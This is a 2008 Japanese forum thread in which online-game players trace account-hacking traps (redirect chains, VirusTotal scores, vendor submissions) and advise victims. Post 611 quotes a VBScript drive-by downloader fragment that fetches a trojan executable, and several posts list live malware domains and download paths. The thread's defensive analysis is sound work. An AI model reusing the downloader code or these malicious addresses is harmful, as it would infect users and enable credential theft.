>510の www■panslog■net/wiki/index1■htm とか。
罠リンクを辿ると、最終的にこういった感じのページが出てくる。

※共に生きてる罠アドレスなので、直で踏まないように。

608 名前:(○口○*)さん:08/05/17 02:54 ID:VpK8gybw0
>>607
こちらで確認した感じでは、>>606の中身も>>510もまだ生きてた。
なので、安易に踏むべきではない。

TinyURL関連で調べていたら、丁度良さそうな対策の記述を見つけた。
第6回:TinyURL の遷移先が怖くて開けない場合の対処法 ::: creazy photograph
ttp://creazy.net/2007/05/tinyurl_defend.html
>2)もっと便利な Greasemonkey がありました。
> ・TinyURLのリダイレクト先URLをツールチップ表示するGreasemonkeyを作った
ttp://d.hatena.ne.jp/ono_matope/20070428#1177790750

>4)オチ:ちゃんとプレビュー機能あった
>TinyURL の機能で遷移する前に遷移先の URL を表示して確認する事ができるらしい。
> ・Preview a TinyURL
>「Click here to enable previews.」リンクをクリックするだけ。
(NGワードに引っ掛かるので、TinyURL自体の設定ページは省略)

4)を実行するとCookieを食わされるので、TinyURL関連のクッションページが有効になる模様。

609 名前:607:08/05/17 04:03 ID:wfo8zgnT0
>608
そんな馬鹿な、と再度チェックしたら、何か復活してた……
テスト環境(VMWare/Ubuntu8.04(火狐3β5))上でソースチェッカー
+直で飛んで確認もしたんだけど……

結果として誤報となってしまい、申し訳ないです>606、ALL

yaplog■jp/lmhtmy
-->tinyurl■com/yr9mtf/
---->www■wacacop■net/blog/
------>www■wacacop■net/wiki/index1■htm (VirusTotal:17/32)
-------->www■wacacop■net/wiki/sever■exe (VirusTotal:5/32)

>606
index1■htm はカスペ・AVG・Microsoft等、半数は検出したものの
NOD32・Avast・McAfee・Symantec等はスルー

sever■exeは AVG・eSafe・F-Secure・Microsoft・Norman のみ検出
Avast・カスペ・NOD32・McAfee・Symantec 等々多数がスルー

AVGが共に検出してるので、念のためAvastアンインスト・AVGインストで
チェックしてください。
WUしてるから、多分引っかかってないと思うけど……


取りあえずカスペとNOD32に検体提出してきます。

610 名前:607:08/05/17 05:18 ID:wfo8zgnT0
カスペより返答

sever■exeはTrojan.Win32.Inject.cbi として、次の更新で対応との事

611 名前:606:08/05/17 06:02 ID:uJliC+eg0
色々混乱を招いてしまったみたいで大変申し訳ございませんでした

AVGで再検索してみたほうがいいみたいですね

ウイルス部分が

</iframe>
<script language=VBScript>
On Error Resume Next
cuteqq = "http://www■wacacop■net/wiki/sever■exe"


とありますが、上記において
firefoxはVBSスクリプトをサポートしていないとの記述がありましたが
firefoxでこのURLを見た場合、ウイルスをダウンロードしないということでしょうか?

612 名前:(○口○*)さん:08/05/17 09:57 ID:qFD+0j/j0
>>610
Inject系が復活してたのね。

その1 >>606
www■wacacop■net/wiki/sever.exe
その2
www■teamerblog■com/wiki/cer.exe
www■articlelin■com/wiki/cer.exe
その3
www■skywebsv■com/Blog/k1.exe
www■bluewoon■com/Blog/k1.exe

まともに引っ掛けたのはAVGとMicrosoftくらいなので
あちこちに提出済み。

>>611
VBScriptならそのとおり。

613 名前:607:08/05/17 10:17 ID:wfo8zgnT0
先ほど確認した所、カスペがsever■exe をキャッチ。
多分オンラインスキャンでも検出すると思う。

>612
カスペのウィルスウォッチ( http://www.kaspersky.co.jp/viruswatchlite )で
Trojan.Win32.Inject で検索したら、5月に入ってから急増してるっぽい。
特に5/13が酷い。

614 名前:606:08/05/17 14:32 ID:uJliC+eg0
>607 608 612
色々相談に乗っていただきありがとうございました

結果報告させていただきます
AVG:検出せず
カスペル: >613の書き込みの後検索したが出ず

万全を期してOS再インスト


これらから推測すると、firefoxで閲覧したためVBSが動かず
exeファイルをDLし無かったってことでしょうか。
友人が IE&カスペルを使っていますが・・・カスペルが反応しないとなると
更新前の状態で踏んだ場合知らないうちにトロイをDLしているということに。

これを期にIE以外のブラウザを知人たちに教えようと思います。

615 名前:(○口○*)さん:08/05/17 18:03 ID:2Dg4rTBs0
>>606さんと似たような状況です

【      気付いた日時          】今朝
【不審なアドレスのクリックの有無 】 ブログのコメントを誤って踏む
【  アドレス   〕yaplog■jp/lmhtmy
【     OS    】XP SP2
【使用ブラウザ 】 firefox 2.0.0.12
【WindowsUpdateの有無】 最新
【 アンチウイルスソフト 】avast
【その他のSecurty対策 】 無し。
【 ウイルススキャン結果】 Avast,AVG,カスペオンラインともに検出なし。
【hosts変更】無
【PeerGuardian2導入】無


リンク先をコピペしようとしたところ誤ってクリックしてしまいました。
飛んだ先でAvastが反応。
「サイズ0のiframeが含まれています」といったようなことを言われたので,切断しました。

こちらの都合で再インストールはできないのですが,一応はこれで防げたと考えても
良いのでしょうか。

とりあえず今からPGを導入してきます。

616 名前:(○口○*)さん:08/05/17 18:31 ID:A3/exu3d0
似たような状況、じゃねーだろ…そのあとの書き込み読んでるのかお前は…

あと再インストールできない都合とか知ったこっちゃないから

617 名前:(○口○*)さん:08/05/17 19:11 ID:2Dg4rTBs0
すいません,環境と間違えました。

たしかに知っちゃこっちゃないですよね。いらないこと書いて申し訳ありませんでした。
しばらく自分で調べてみます。

618 名前:(○口○*)さん:08/05/17 20:06 ID:A3/exu3d0
いや、だからそのあとの書き込みをだな…

619 名前:(○口○*)さん:08/05/17 20:28 ID:2Dg4rTBs0
読みました。


なんというか,大変申し訳ありませんでした。

620 名前:(○口○*)さん:08/05/17 20:49 ID:9fpUrjl60
【      気付いた日時          】さきほど
【不審なアドレスのクリックの有無 】 ブログのコメントを誤って踏む
【  アドレス   〕www■wacacop■net/blog/
【     OS    】XP SP2
【使用ブラウザ 】 firefox 2.0.0.12
【WindowsUpdateの有無】 最新
【 アンチウイルスソフト 】ウイルスバスター08
【その他のSecurty対策 】 無し。
【 ウイルススキャン結果】 カスペオンラインで反応あり。
【hosts変更】無
【PeerGuardian2導入】無


sever■exeを踏んだ場合、踏んだタイミングで情報もっていかれてるのか
それともROを起動してIDやらパスをいれた時にもっていかれるのか
どちらでしょうか。

621 名前:(○口○*)さん:08/05/17 21:33 ID:I8bGtz6l0
なぁ……テンプレの
>【テンプレの参考サイトを読んだか】 (Yes/No/今から読みます)
この行消したの誰だよ……

622 名前:(○口○*)さん:08/05/18 00:07 ID:pwS4xnkZ0
>>621
必要ないから消したのではないでしょうか?
すみからすみまで見たわけではないですが色々サイトは見てきました。
調べてもわからなかったから聞いています。
それでも参考サイト見て来いというのならばどのサイトのどの辺りを見ればよいでしょうか?

623 名前:まとめ臨時 ◆kJfhJwdLoM:08/05/18 01:29 ID:QkayuTPu0
>>621
テンプレ>>4にはちゃんとあるのですが…。
つい最近だとテンプレを活用している例があまり無くて
>>606の書き込みでその項目を消した物を確認。

それ以降の書き込みでは>>4のテンプレではなく、
最近の書き込みから流用したのではないかなと。
テンプレ厨と言われるかもしれませんが>>4から持ってきてほしいところ。


>>622
手前味噌ですが。
http://sky.geocities.jp/ro_hp_add/ro_tai01.html#hack01
http://sky.geocities.jp/ro_hp_add/ro_tai01.html#login

"いちおう"踏んだ後にログインしなければOK。

ただ踏んだ後はできるだけネット接続を切断してROだけに限らず、
パスワードや個人情報関連を利用するソフトウェアや
ウェブサイトにはログインしない事が大事です。

ただ踏んだからといって盗まれるわけでもないですが、
色々なものが複合している場合もあり、
MSNやmixiなどIDやpassをクッキー登録できるものは
踏んだ直後に持っていかれている可能性があるかもしれませんので
一概には言えないのです。

624 名前:まとめ臨時 ◆kJfhJwdLoM:08/05/18 01:31 ID:QkayuTPu0
ただ が多い文章だわ。

こちらの例の方がわかりやすいかもしれない。
http://sky.geocities.jp/ro_hp_add/ro_higakyu.html#jirai

625 名前:(○口○*)さん:08/05/18 02:43 ID:/J83Yn5y0
>>608でも既出だけど、TinyURLのダイレクトジャンプ禁止設定はテンプレ入りした方がいいかもしれないな。
ttp://tinyurl■com/preview.php にアクセス、Click here to enable previews.をクリック。
これでCookieを取得したブラウザからは、飛び先URLの確認ページが表示されるようになる。
無論、使用しているブラウザごとに実行する必要があるが、有効期限は取得時刻+10年らしいので、まず問題ないだろう。

626 名前:(○口○*)さん:08/05/18 18:54 ID:02D0LKNv0
今更だけど
http://common.ragna.info/index.php?rosafe_log
このスレの4のログが実際保存してる

弓手Wikiの中の人に頼んで
これと同じプラグインとか入れてもらえばいいんじゃね?
そしたらログを保存できるよ

627 名前:まとめ臨時 ◆kJfhJwdLoM:08/05/18 23:37 ID:qudYSdAg0
>>608 >>625
TinyURLのダイレクトジャンプ禁止設定についてのログ部分を転載して
"対処と疑問のQ&A・その2"に追加してみました。
http://sky.geocities.jp/ro_hp_add/ro_tai02.html#tanshuku

628 名前:(○口○*)さん:08/05/18 23:57 ID:hPHJ5k9G0
スレチだったら申し訳ないのだけれど質問です。

ROアカハックまとめの危険サイトに上がってるアドレスが
「勇気がなくて踏めない〜」では無害判定されてたんだけど、これはどっちを信用した方がいいんだろう?

該当のアドレスはttp://world2001■blog39■fc2■com/
踏んだ後ソースチェッカーとスパイウェアとウイルスチェックかけたけど特に何もなし。

あちこち張られてるから迷惑には変わりないんだけど…。

629 名前:(○口○*)さん:08/05/18 23:59 ID:Ccjc3wx/0
危険リストは危険が確認されたことのあるサイトのリスト
罠が撤去されてることはあり得る

でも次にアクセスしたときに無害かどうかは保証できない

630 名前:(○口○*)さん:08/05/19 00:10 ID:uR8cGoLs0
>628
>506以降参照。

念のためチェックしてきたが、>510と同じ状態で罠があった。

world2001■blog39■fc2■com
--->tinyurl■com/6722xv
----->www■articlelin■com/blog
------->www■panslog■net/wiki/index1■htm
------->www■teamerblog■com/wiki/cer■exe

631 名前:(○口○*)さん:08/05/19 00:18 ID:L30PyHmr0
早々にありがとうございます
チェックに引っかからなかっただけでしたかorz

撲滅に逝って来ます。
あと、怖くて踏めない〜にも一応報告して来ます。

632 名前:(○口○*)さん:08/05/19 00:32 ID:uR8cGoLs0
ちなみにソースチェッカーでそこ覗いた時、tinyurlの罠がiframeで
仕込まれてるのに、左側の方が何故か反応してない。

そのせいで「勇気がなくて踏めない〜」では無害判定されたんじゃないかな。

一応チェック結果
index1■htm VirusTotal 16/32
 ttp://www.virustotal.com/analisis/b7367db9f864218998f7e2c74ba109fd
  Kaspersky Trojan-Downloader.JS.Agent.brl

cer■exe VirusTotal 9/32
 ttp://www.virustotal.com/analisis/49853788166688e27cfcd9e5213a1f45
  Kaspersky Trojan.Win32.Inject.cbd

共にカスペは撃墜してるが、cer■exe は>510から差し替えられてるっぽい。

633 名前:(○口○*)さん:08/05/19 04:37 ID:OwDZmYEY0
>>626
BSスレの保管所(BSWikiの中の人が管理)に全部のログも有って、NAMAZU検索も出来るようです。
http://smith.z49.org/kako/ah/

634 名前:(○口○*)さん:08/05/19 06:01 ID:VTcoYDmA0
見慣れないアドレスにh抜きでもないから、警戒しちまったぜ。。。

635 名前:(○口○*)さん:08/05/19 08:26 ID:L30PyHmr0
>>632
何から何までありがとうございます(つД`)
スパイウェアチェックかけなおしたらレジストリ変更されてました。危ない。

636 名前:(○口○*)さん:08/05/19 12:57 ID:Lgxs0xs+0
>>632
>>612 で差し替え。

637 名前:(○口○*)さん:08/05/20 20:55 ID:gonH0gHp0
カスペルスキー氏がマルウェア激増を予測、検体数は年間2,000万件に
ttp://internet.watch.impress.co.jp/cda/special/2008/05/20/19612.html
世界から見て日本固有の「脅威」には何があるでしょうか。
カスペルスキー氏:Winnyが挙げられるでしょう。
ワンクリック詐欺も日本独特のものといえます。
また、アジア圏では、オンラインゲームを狙ったマルウェアが多いのも特徴です。
欧米でもオンラインゲームはありますが、アジア圏では
プレイ時間が圧倒的に長いことから標的にされているのだと思います。
じつは、こうした被害に対抗するために、中国にアジア向けの解析ラボを立ち上げました。

いきなり現地にラボ立てるかぁ? この鬼軍曹め!

638 名前:(○口○*)さん:08/05/20 21:29 ID:qr6bUZr60
アジアに建てても意味無いだろ、と思ったら中国かw
さすがロシア

639 名前:(○口○*)さん:08/05/20 21:30 ID:RfMlAVkc0
>>637
どうでもいいけどIDがゴンホー

640 名前:(○口○*)さん:08/05/20 21:50 ID:et5yPbP/0
検体数が現時点で200万って事は、日に14000件ちかい提出量。
年末に2000万という事は、日に5万を軽く越えるって事だよな……

しかし先日検体投げたら例によって小一時間で返答あったし
このフットワークの軽さだけは奪われないようにして欲しいものだ。


そしてその中国でも大規模なSQLインジェクション攻撃があった模様
ttp://www.itmedia.co.jp/news/articles/0805/20/news023.html

>各種中国語ソフトやRealPlayer、MS Data Access Componentなどの脆弱性
やはりmpackみたいな複合型が主流のようで。
WUしてるから・IE使ってないから、みたいな状況は危険だね……

641 名前:(○口○*)さん:08/05/20 22:25 ID:gonH0gHp0
>>612 とたぶん同じ系統、更新は今日。
www■soracger■com/wiki/admin.exe
VT ttp://www.virustotal.com/analisis/76b04cccb7cf0306b3ea4c2215979ce8

642 名前:(○口○*)さん:08/05/20 23:46 ID:gonH0gHp0
BitDefender
ttp://itpro.nikkeibp.co.jp/article/Interview/20080515/301944/
最近ちょっと落ち目なのが気になるが…
(個人的な体感としてAntiVirより下、avastより上)。

643 名前:(○口○*)さん:08/05/21 15:38 ID:feLZsIS40
カスペルスキーはオンラインゲームと相性悪いと言われてるのが気になるんだよなぁ。
自分も一台カスペいれてるけど、プロアクティブディフェンスONにするとROがプレイ不能くらい
の負荷状況になるし…

この辺をどうにか解消仕手欲しいんだが…

644 名前:(○口○*)さん:08/05/21 16:36 ID:IJXD2e0G0
>>643
うちもカスペだけどぜんぜん平気だよ〜。
ただ、マップ移動やキャラセレなどのローディングの前のフェードアウトして
画面が暗くなったところで1〜2秒止まるくらい。それ以外はぜんぜんスムーズ。
CPUがペン4なのでローディングの前と後のダブルで止まるけどね><;
普段はRO中もプロアクティブディフェンス有効のままで、Gvレースのときだけ
プロアクティブディフェンスを切っています。

645 名前:(○口○*)さん:08/05/21 19:54 ID:IVtcw8l30
【      気付いた日時          】5/15
【不審なアドレスのクリックの有無 】クリックではなくファイルの解凍で
【  アドレス   】多分ここのファイル www■forest■impress■co■jp/article/2007/05/18/sumoutori■html
【     OS    】WindowsXP Home SP2
【使用ブラウザ 】firefox2.0.0.14
【WindowsUpdateの有無】 自動更新
【 アンチウイルスソフト 】ウイルスバスター2008
【その他のSecurty対策 】ルータ
【 ウイルススキャン結果】ウイルスバスター2008でTROJ_SMALLTR.YD発見
【テンプレの参考サイトを読んだか】今から読みます
【hosts変更】無
【PeerGuardian2導入】無
【説明】
友人からzipファイルを受け取って解凍をしたら
上記のウイルスが検出されました。
慌てて隔離されたウイルスを駆除して
再度スキャンをかけたら検出されなくなったのですが(念の為カスペルスキーでも確認)
上記のウイルスはアカハック系のウイルスなのでしょうか?
ググってみたのですが、自分では判断ができませんでしたので。

646 名前:(○口○*)さん:08/05/21 20:11 ID:rq1CEHf60
窓の杜なんてアカハックサイトではないだろ。
2chセキュ板のバスタースレで聞けば?

647 名前:(○口○*)さん:08/05/21 20:25 ID:b971vgOw0
携帯端末が原因なのか分からんが、作者のHPが404で見れない件

取りあえず、怪しいファイルが検討ついてるんだから、VirusTotalに
そのファイルをUpLoadしてはどうか
サイトはググればすぐ出てくるし、検索もすぐだ

648 名前:(○口○*)さん:08/05/21 20:26 ID:IVtcw8l30
よく見ると確かに窓の社のURLでした。
失礼しました。
しかしそうなるとこのウイルスはなんなのか・・・

649 名前:(○口○*)さん:08/05/21 20:28 ID:b971vgOw0
>646
上でも言われてるが、SQL Injection攻撃やらでやられる可能性忘れてないか?
価格コムやMSNを筆頭に、大手サイトに罠を埋め込まれた事例には事欠かない。

杜だから安全だ、なんて事はありえないぞ。

650 名前:(○口○*)さん:08/05/21 20:30 ID:IVtcw8l30
>>647
すいません、その怪しいと思われるファイルは削除してしましました。

651 名前:(○口○*)さん:08/05/21 20:44 ID:5cJfadV30
>友人から
って時点でテンプレの意味まったくナシ

652 名前:(○口○*)さん:08/05/21 21:16 ID:rq1CEHf60
>>649
サイト・ページのどこかに無差別に仕込むのならともかく
正規のダウンロードのリンクに仕込むのは意外と面倒なんよ。

653 名前:(○口○*)さん:08/05/21 21:34 ID:lLCiYMFv0
ネット通販利用者の情報など2万件、流出?
ttp://www.yomiuri.co.jp/net/security/ryusyutsu/20080521nt04.htm

654 名前:(○口○*)さん:08/05/21 21:58 ID:1iWEXPgZ0
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_SMALLTR.YD
>別 名: TR/Crypt.XPACK.Gen (Avira), Mal/EncPk-BP (Sophos),
トロイとしか判らんな

>652
>窓の杜なんてアカハックサイトではないだろ。
難易度は別にして、こういう考えは危険、って意味じゃないか?

>653
>約130件はオンラインゲームでカードが不正利用されていた。
さすが中華、としか言いようがないな……

655 名前:(○口○*)さん:08/05/21 22:38 ID:h8jJ+EO60
オンラインゲームの高い匿名性が、ロンダリング手段として確立してきた事の顕れとも言えるか。
課金DLパッケージのような、ある程度まとまった金額のデジタル商品が存在する上に、新規無料垢で売り逃げ可能だからねえ。

656 名前:(○口○*)さん:08/05/22 00:30 ID:KP0GDB140
ベクターのファイルにウィルスが仕込まれてたのも過去にあったし、無いとは言い切れんよ。
ただ普通のツールでもトロイと検知されてしまうような物もあるからなんとも。

657 名前:(○口○*)さん:08/05/22 04:02 ID:s2g2bDCK0
いつの間にやらアカウントハックを受けてました(涙
とりあずウィルスソフトで検索中・・・orz

658 名前:(○口○*)さん:08/05/22 04:33 ID:6qdg+qJG0
南無

てか報告するスレはわかってても、そこを見て対策するのは後回しってのが未だに多いよね

659 名前:(○口○*)さん:08/05/22 07:33 ID:s2g2bDCK0
一応ここも見ててソフトも入れてたんだがな・・・・
ちなみに飯食うために落ちてる間に持ってかれた
23時頃に一度落ちて美味いラーメンを食いにいって
露店だそうそ2時ごろつないだらちょうどアクセスシテヤガッタヨ
即効スキャン削除の上PASSは変えたが・・・オソカッタ

660 名前:(○口○*)さん:08/05/22 08:23 ID:038gaTsm0
>>655
ずいぶん前から言われているねぇ。WoWでは日常茶飯事だし、
換金できるSecondLifeがさらに後押ししちゃった感がある。

661 名前:(○口○*)さん:08/05/22 17:09 ID:wVa/NHvX0
>>644
プロアクティブディフェンスONにするとPT窓開くと致命的に遅くなるんだよね。
PT窓から支援かけてるんでかなり致命的に…

662 名前:(○口○*)さん:08/05/22 18:56 ID:CVdU7ees0
知人のブログに書き込まれていたコメント。多分アカハックだと思われます。

【RO】SノビでAspd190(修正)
動画テストその2、前回画質がかなり悪かったので修正、前よりはましになっていると思います(笑)、
動画は同じ物を一部カット装備説明追加、A=DのSノビが崑崙闘技場でAspd190出して見ました、
あと、おまけで課金なしでちょっと狩ってます。
ttp://www■gameicity■com/flash/rmovo.zip

既出かな?

663 名前:(○口○*)さん:08/05/22 19:01 ID:8ynK7GDi0
【      気付いた日時          】5/22 23時頃
【不審なアドレスのクリックの有無 】有 
【  アドレス   】www■sakerver■com/web/douga/stream/keitaidouga51200079■zip
【     OS    】WindowsXP Professional SP2
【使用ブラウザ 】IE6.0
【WindowsUpdateの有無】自動
【 アンチウイルスソフト 】NortonInternetSecurity2007
【その他のSecurty対策 】無
【 ウイルススキャン結果】カスペルスキー、ノートンで検出結果なし
【テンプレの参考サイトを読んだか】Yes
【hosts変更】無
【PeerGuardian2導入】無
【説明】
mixiのコメント欄に載っていたURLを何かの動画サイトかと思い
迂闊にもそのままアドレスバーでURLを削って入れてしまいました,,,。
真っ赤なだけの画面が出たので慌てて閉じ
ノートンでスキャンしましたが何も出ず、
カスペルスキーでもスキャンしましたが同様に何も出ませんでした。
その後ネットの接続を切り、今日ネットカフェへ行って
カスペルスキーでスキャンした後 パスワードなどを変更してきました。

それでもまだ心配なのでシステムリカバリーをしようと思いバックアップ作業をしていた所
窓がブラクラの様に何重にも開く現象が度々起こるようになりました。
(その場合は強制終了させてます)
必要なファイルはYahooのブリーフケースに置いてこようと思っていたのですが
IDとパスワードを入れるのが怖くて出来ません。
CDに収めるのもウイルスか何かを一緒に持ってきちゃいそうで,,。
これはそのままバックアップ準備を進めても問題ないでしょうか?
それともバックアップはとらずにリカバリしてしまう方が安全でしょうか?
自分の認識の甘さと安易な行動で起こした事なのに、申し訳ありません。

664 名前:(○口○*)さん:08/05/22 19:05 ID:6qdg+qJG0
ネカフェで変更したことの方が怖いんだが…
何の窓が開いてるのかもわからない、IEが自動で出てきてるんだろうか

665 名前:(○口○*)さん:08/05/22 19:37 ID:8ynK7GDi0
>>664
他に環境が無く…すみません
検索しようとIEを起動する時、フォルダに有る画像のプレビューを見る時
それとメモ帳を開いた場合もなるようです。
電源落とすと直りますが、しばらく作業をしていると突然増えます。

666 名前:(○口○*)さん:08/05/22 19:51 ID:Mq4zWD7o0
VMware、リモートデスクトップ、ソフトウェアキーボードを利用して、
今より少しでもセキュアな方法はないだろうか。
特に、パスワードを変えるとか、そっち系で。

667 名前:(○口○*)さん:08/05/22 19:54 ID:h/wjStUj0
IEのインターネットオプションの各設定と、スタートアップの確認
IEではJavaScriptとJavaを当面禁止に
FirefoxやOperaなどの非IEブラウザの導入
Spybotなどのスパイウェア駆除ツールの導入とスキャン
まずはこれだけしてみれば?

668 名前:(○口○*)さん:08/05/22 20:39 ID:WvFyWO9+0
RO以外のことを全てLinuxでやる、とか。

669 名前:まとめ臨時 ◆kJfhJwdLoM:08/05/22 20:45 ID:E4oddN+00
>>662
情報ありがとうございます。新規でした。
なんだかあちらこちらで爆撃されているようですね‥。
さっそくリストに追加しました。


>>665
あまり意味無いかもしれませんが、
画像に関してはプレビュー機能を切ってしまうという手は?

フォルダウィンドウのツールで設定
 ツール→フォルダオプション→従来のWindowsフォルダを使う

USBメモリやCD-Rにバックアップできる環境があるなら
そのまま放りこんでもある程度なら大丈夫かと思われます。
戻す作業の時にCD自体にウイルススキャンをかければよろしいかと。

残しておきたいデータ類の場所がある程度特定さえできていていれば
問題は起きにくいでしょうし個人で管理しているフォルダ名の所に
ウイルスが紛れる事は少ないかなあ…とか。
.jpgや.pdfに偽装されていなければ
注意すればよいのはexe、com、dllとか、
LZH、Zipなどの圧縮ファイルなので大まかでも選別がしやすいはずです。

DOS環境で作業が出来るのであれば
起動時F8でセーフモードのコマンドライン作業をするという荒業も。
(FDやFILMNTなどファイル管理ツールが無いと厳しいですが)

ROのパスワードは携帯電話等の端末環境をお持ちなら
携帯で変更できるかわかりませんが多分できるはず…?

・ガンホーゲームズのサポートセンタートップ
https://secure.gungho.jp/index.aspx

670 名前:(○口○*)さん:08/05/22 21:30 ID:2HjvJfxu0
スレの2か3か辺りで出てた話だが、手軽にクリーンな環境を用意する方法は
次の2つかな

A)1CD Linixを使う
B)VMWare+Lunixを使う

1CD Linuxなら完全に安全な環境が作れる。
(イメージそのものに感染してたら別だけど)
再起動すれば、またクリーンな環境になるので、多少の無茶も可能

欠点は、事前の準備が必要な事。
ログイン合戦の時に悠長にDL+焼きつけ+再起動なんて真似は出来ない。


仮想PCはVMWarePlayer+Ubuntuが共に公式配布の形で無償提供されてる。
Windows上から操作するので、ログイン合戦時は1CD Linuxより融通が利く。
また仮想PCに何か感染しても、イメージ削除でクリアされる。
(1CD Linux時の再起動と一緒)

欠点は、キーロガー系・パケットキャプチャー系の罠に感染してた時に
100%の信頼が得られない事。

過去スレでも検証されてたが「100%・絶対」安全と断言は出来なかった。  
皆に仮想PC経由で情報が抜かれる可能性は0に近いと思ってたが、可能性だけで
論じるなら危険性は0ではない。

ケースバイケースだが、利便性と合わせて考えると、検体チェックや危険アドレスの
調査、普段からの利用には仮想PCが、クリーンな環境からのパス変更には1CD Linuxが
向いてる。

あと個人的な意見だが、リモートデスクトップやソフトウェアキーボードは
セキュアとは言い難いと思う。


ちなみに自分は検体入手・調査にはVMWare+Ubuntu(火狐とwget)を使ってる。
昔と違って仮想PCは敷居がかなり低くなってるので、結構お勧め。
無償で出来るし、遊びで使う分でも楽しめる。

671 名前:(○口○*)さん:08/05/22 22:35 ID:pLfLdShH0
>663
Spybotとかの、スパイウェア用ツールを試すべし
ハクのトロイが子供騙しとしか思えないぐらい、システムに食い込む奴も多い

正直、カスペとかだけに頼るのは片手落ち
万能の不正対策ソフトがない以上、ハク対策だけじゃなく、一般的な
マルウェア対策も同時に行った方がいいよ

672 名前:(○口○*)さん:08/05/22 23:15 ID:Mq4zWD7o0
>>670
リモートデスクトップパケットは、
CKPTプロトコル(RDPだと思ってたんだけど)という
謎なものが流通するみたいだね。

自分の家がセキュアなら、どこにアクセスしたかわからないから、
ネカフェのPCで直接変えるよりマシかな程度。
(アカウントを有名ネトゲ公式でログインされる可能性はあるが)

ソフトウェアキーボードも、普通に打つよりマシじゃね?程度で。

673 名前:(○口○*)さん:08/05/23 00:17 ID:nuwC2zz40
>>663です
レス有難う御座います。
色々検索が枝分かれして混乱気味ですが
とりあえずSpybotは優先して落としてみました。
ウイルスなどはみつからなかったのですが、
”ファイルまたはディレクトリ C:¥$Mft が壊れ 〜 CHKDSKを実行してください”と出ました。
CHKDSKを実行後、spybotが反応し必要なレジストリの変更にBootExecuteを指定。
ですが何度変更を許可しても、CHKDSKをするとまた同じ反応をします。
更に検索を続けるとシステムの復元を勧める記事も多かったので試したのですが失敗でした。
(シマンテックがどうのこうの…すみません、メモし忘れました…)
これ以上進むとスレ違いになるので控えますorz
とりあえずファイルはCDに移し、リカバリ後問題があるようなら修理に出すことにします。
ちなみに携帯は二年程前から使用しているAUなのですが、
EzwebとOpera共にエラー等でログイン失敗でした。

VMwareはまだじっくり調べてはいないのですが
>>670さんを参考に勉強して、良さそうならこの方法で対策を練ります。
同時にセキュリティはもっと基礎から学んでいこうと思います・・・。
お騒がせして申し訳ありませんでした。
そして皆様、ご助言本当に有難う御座いました。

674 名前:(○口○*)さん:08/05/23 00:28 ID:+e3Sqzeg0
>>673
ブートセクター(PC起動時に最初に読み込まれる箇所)が、壊れたか書き換えられたかの可能性あるから
HDDのフォーマットをしてからリカバリするといい。

675 名前:(○口○*)さん:08/05/23 00:38 ID:R7lWvBHp0
>673
まず www■sakerver■comだが、ここは危険ドメイン扱いになってる。
自分のhostsを確認(hostsRenewScriptで自動更新してるもので。)したら
127.0.0.1と登録済みだった

んで、件のファイルを拾ってきたところ、VirusTotalで5/32という惨状
ttp://www.virustotal.com/analisis/a304aa18f393acb425d463ae93a53c45

>AVG PSW.Ldpinch.11.BQ
>DrWeb Trojan.PWS.Reggin.52
>eSafe Suspicious File
>F-Secure Trojan.Win32.Inject.ceo
>Microsoft PWS:Win32/Magania.gen

カスペ・NOD32・Avast等全滅。
例によってAVGやMicrosoftが検出。
傾向からして、ハク系かな?

駆除するならAVGかMicrosoftだろうけど
>”ファイルまたはディレクトリ C:¥$Mft が壊れ 〜 CHKDSKを実行してください”と出ました。

トロイが悪さしたかどうかは何とも言えないが、HDDがヤバい事になってるね
「CHKDSK /R」で修復出来る(かもしれない)けど、読めるうちにバックアップを急いで行った方が良い。
放置してるとそのうちWindowsが起動しなくなる。


取りあえず、カスペとNOD32に検体提出してきまする。

676 名前:(○口○*)さん:08/05/23 02:19 ID:ISBmprmn0
VMWareの無料のやつって、DirectX使った描画ができないんじゃなかった?
有料のやつの体験版使えばイメージ作れそうな気がするけど、
仮想PCでWindows+nProを動かすとなると、結構なスペックのパソコンが必要になるね

677 名前:675:08/05/23 02:58 ID:R7lWvBHp0
カスペより返答有り

keitaidouga51200079■zip (※実際はrarファイルで拡張子がzipなだけ)
-> ro%C6%B0%B2%E8■exe (Trojan.Win32.Inject.ceo)


>676
安全な環境構築に仮想PCを使うという話で、VMWare上でROや他ネトゲを
動かすという話じゃないと思うけど。

678 名前:(○口○*)さん:08/05/23 06:18 ID:uqJT7duS0
>>677
その検出名はF-Secure(のKasperskyエンジン)と同じなので
VTが調子悪かったんだと思う。手元では昨夜の時点で検知した。

679 名前:(○口○*)さん:08/05/23 12:25 ID:CiMYc/7Q0
どちらかといえば、VTがパターンファイルを取得したタイミングだろうな。

しかしInject系に限って言えば、MSは強いなぁ。
OneCare試してみたくなってきた。
カスペも数時間の差で対応してるから良いといえば良いんだが。

あと地味にDrWebも強い。
こっちはファイルの調査用の投稿フォームがあるから、怪しいファイルが
ある場合、投げてみるのもいいかも。

680 名前:(○口○*)さん:08/05/23 12:32 ID:uqJT7duS0
Dr.WEBのフォームが最近調子悪い

681 名前:(○口○*)さん:08/05/23 15:44 ID:GLryCDTS0
今日のパッチ後にavastが
〜RagnarokOnline\GameGuard\dump_wmimmc.sys
隠しファイル
を疑わしいマルウェアとして報告してきたんだけど無視しといていいのかな?

682 名前:(○口○*)さん:08/05/23 15:45 ID:WGOopeAk0
ちょいと質問です。
ここ数日、mixiにROの内容を書いていたら
「カプラの猫耳試してみました〜」だの「アサクロ何とか動画〜」という
タイトル?とzipのアドレスのみ(コメ無)を載せてくる人が2人居たんですが、
片方はROのコミュとか入ったり日記で「自分のアカウントを利用して
ROの単語が入ってる日記に無差別にコメントを書き込んでいる〜」と
現状を書き込んでいる人、
もう片方はコミュにも自己紹介にもROのかけらも感じない一般人のような
人(しかも現状に気づいてないらしい)だったんですが、
前者はともかく後者がどうして発信元になっているのか判らなくて…

最近の垢ハックウィルスには感染者のmixi垢情報の搾取と
無差別コメント書き込み機能なんかも付いてるんでしょうか?
それとも情報を得た業者が自分で…?

683 名前:(○口○*)さん:08/05/23 17:23 ID:onrfI3rx0
>>681
それはただのnProのファイルだから気にしなくてok

684 名前:(○口○*)さん:08/05/23 17:24 ID:+e3Sqzeg0
>>681
それ、nProのファイルだから許可しないとRO起動しなくなるぞ。

>>682
mixiの垢をハックして、別人がなりすまして、アカハックのアドレスを貼り付けてまわるといった事例が
よく見られます。

運営に通報すると共に、なりすまされた人にも連絡し、セキュリティソフト入れてパス替えるように勧めると親切です。
(勿論、業者が自分でmixiの垢をとっている場合も無いとは言い切れませんが)

685 名前:(○口○*)さん:08/05/23 17:58 ID:WGOopeAk0
>>684
返答有難う御座います!
